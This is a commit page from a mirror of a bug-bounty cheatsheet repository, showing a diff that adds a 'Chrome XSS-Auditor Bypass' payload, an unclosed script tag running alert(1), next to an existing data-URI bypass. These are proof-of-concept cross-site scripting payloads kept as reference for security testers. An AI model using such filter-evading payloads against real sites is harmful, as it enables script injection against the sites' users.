mirror of
https://github.com/EdOverflow/bugbounty-cheatsheet.git
synced 2024-11-22 11:03:14 +00:00
Add another Chrome XSS-Auditor bypass.
This commit is contained in:
parent
8c6e54dd65
commit
a4a9136630
1 changed files with 6 additions and 0 deletions
|
@ -12,6 +12,12 @@
|
||||||
<script src="data:,alert(1)%250A-->
|
<script src="data:,alert(1)%250A-->
|
||||||
```
|
```
|
||||||
|
|
||||||
|
**Chrome XSS-Auditor Bypass**
|
||||||
|
|
||||||
|
```html
|
||||||
|
<script>alert(1)</script
|
||||||
|
```
|
||||||
|
|
||||||
**XSS Polyglot** by [Ahmed Elsobky](https://github.com/0xSobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot)
|
**XSS Polyglot** by [Ahmed Elsobky](https://github.com/0xSobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot)
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
Loading…
Reference in a new issue